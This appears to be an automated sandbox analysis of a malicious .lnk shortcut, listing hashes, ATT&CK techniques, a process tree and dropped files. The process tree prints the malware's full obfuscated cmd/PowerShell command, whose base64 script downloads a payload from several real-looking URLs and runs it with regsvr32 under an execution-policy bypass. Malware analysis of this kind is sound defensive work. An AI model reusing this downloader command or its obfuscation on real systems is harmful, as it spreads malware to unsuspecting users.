505749e24d2ed2cef8c810c1b363d677192dffa0602562ec1d583d1024428ff3

General

Target

505749e24d2ed2cef8c810c1b363d677192dffa0602562ec1d583d1024428ff3.lnk
Size

2KB
MD5

7181932499a362d0f511204daff892a1
SHA1

74e4f14fb09a5179df694ad88af7966cbd86c05e
SHA256

505749e24d2ed2cef8c810c1b363d677192dffa0602562ec1d583d1024428ff3
SHA512

1898ce02e0fc27510c688d1ece348afb38eb86f5525f49b126d11e33fbf6263cff0e84fb3f54a844e26cc8694bb578b00c94f0dcf847e764ae0cf7f12186ed0e

Score

6^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2760	powershell.exe
2628	powershell.exe

An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

pid	Process
2616	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2760	powershell.exe
2628	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 268 wrote to memory of 2616	268	cmd.exe	32
PID 268 wrote to memory of 2616	268	cmd.exe	32
PID 268 wrote to memory of 2616	268	cmd.exe	32
PID 2616 wrote to memory of 2760	2616	cmd.exe	33
PID 2616 wrote to memory of 2760	2616	cmd.exe	33
PID 2616 wrote to memory of 2760	2616	cmd.exe	33
PID 2760 wrote to memory of 2628	2760	powershell.exe	34
PID 2760 wrote to memory of 2628	2760	powershell.exe	34
PID 2760 wrote to memory of 2628	2760	powershell.exe	34

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\505749e24d2ed2cef8c810c1b363d677192dffa0602562ec1d583d1024428ff3.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:268
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /v:on /c AUG4YD6yp0C8FBd5f4yOYKt/tNMqr+hn0eNExEWFNL6kpdH5+vSvskK5oPd3Sx/oOkWW68Cp||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2djY29uLmluL1VwbG9hZGVkRmlsZXMvVVl0Sk5yVDJsbHh5MS8iLCJodHRwOi8vZ2FrdWRvdS5jb20vcGhvdG8wNi9oRXUvIiwiaHR0cDovL2dpYXNvdHRpLmNvbS9qcy9LaGM2bWIweng0S29XWC8iLCJodHRwOi8vcGxyZXNlbmRlLmNvbS9wY2luZm9yL2NxLyIsImh0dHA6Ly90aG9tYXNtYW50b24uY29tL3dwLWluY2x1ZGVzL293Wm5wV21INEQ4ai8iLCJodHRwOi8vZ2xhLmdlL29sZC9QdVZhZmYvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL2puVVJ4dFJtaU8uU0toO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvam5VUnh0Um1pTy5TS2g7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\Admin\AppData\Local\Temp\xLhSBgzPSx.ps1"; powershell -executionpolicy bypass -file "$env:TEMP\xLhSBgzPSx.ps1"; Remove-Item -Force "$env:TEMP\xLhSBgzPSx.ps1"}"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:2616
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c "&{[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2djY29uLmluL1VwbG9hZGVkRmlsZXMvVVl0Sk5yVDJsbHh5MS8iLCJodHRwOi8vZ2FrdWRvdS5jb20vcGhvdG8wNi9oRXUvIiwiaHR0cDovL2dpYXNvdHRpLmNvbS9qcy9LaGM2bWIweng0S29XWC8iLCJodHRwOi8vcGxyZXNlbmRlLmNvbS9wY2luZm9yL2NxLyIsImh0dHA6Ly90aG9tYXNtYW50b24uY29tL3dwLWluY2x1ZGVzL293Wm5wV21INEQ4ai8iLCJodHRwOi8vZ2xhLmdlL29sZC9QdVZhZmYvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL2puVVJ4dFJtaU8uU0toO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvam5VUnh0Um1pTy5TS2g7YnJlYWt9IGNhdGNoIHsgfX0=')) > "C:\Users\Admin\AppData\Local\Temp\xLhSBgzPSx.ps1"; powershell -executionpolicy bypass -file "$env:TEMP\xLhSBgzPSx.ps1"; Remove-Item -Force "$env:TEMP\xLhSBgzPSx.ps1"}"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2760
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -file C:\Users\Admin\AppData\Local\Temp\xLhSBgzPSx.ps1
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\xLhSBgzPSx.ps1

Filesize
826B

MD5
9ef7ef1de13a06e15e0216447db3e3e0

SHA1
57806ff6bf7a70843e3e8c48a0817637c59ea32d

SHA256
f1e70694eec2ca06a484fbc575b97c4875cd147c6827020b3a02af23ed7b812e

SHA512
0d38d5ed6db9f92289f99d072ed0586ec9e129733d8af54a549e400debb43fedb5bb9c70c64e1585390394fe1b198713866a39907c577b4633d3a9178b74203f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a728b03607962587ad054dfec7dec486

SHA1
59d9c5f6c84a56cd53c86f37cf5d7eb1964e50ed

SHA256
7f8324f2fcc7a905e2e300980adb4b36a3adb4601622069cdf6201b0f14198eb

SHA512
120af6f5b363aa8baf466634b8bbfae2aa8d001b282940e5ab97f25acfb6dabd8a47e6be5e45b95075f3c492e9551a45d5abd3c0cccbadd37a0f6bfe8250540d

Download Submit
memory/2760-40-0x000007FEF592E000-0x000007FEF592F000-memory.dmp

Filesize
4KB

Download
memory/2760-41-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

Filesize
2.9MB

Download
memory/2760-42-0x0000000001E50000-0x0000000001E58000-memory.dmp

Filesize
32KB

Download
memory/2760-43-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-45-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-46-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

Filesize
9.6MB

Download
memory/2760-53-0x000007FEF5670000-0x000007FEF600D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing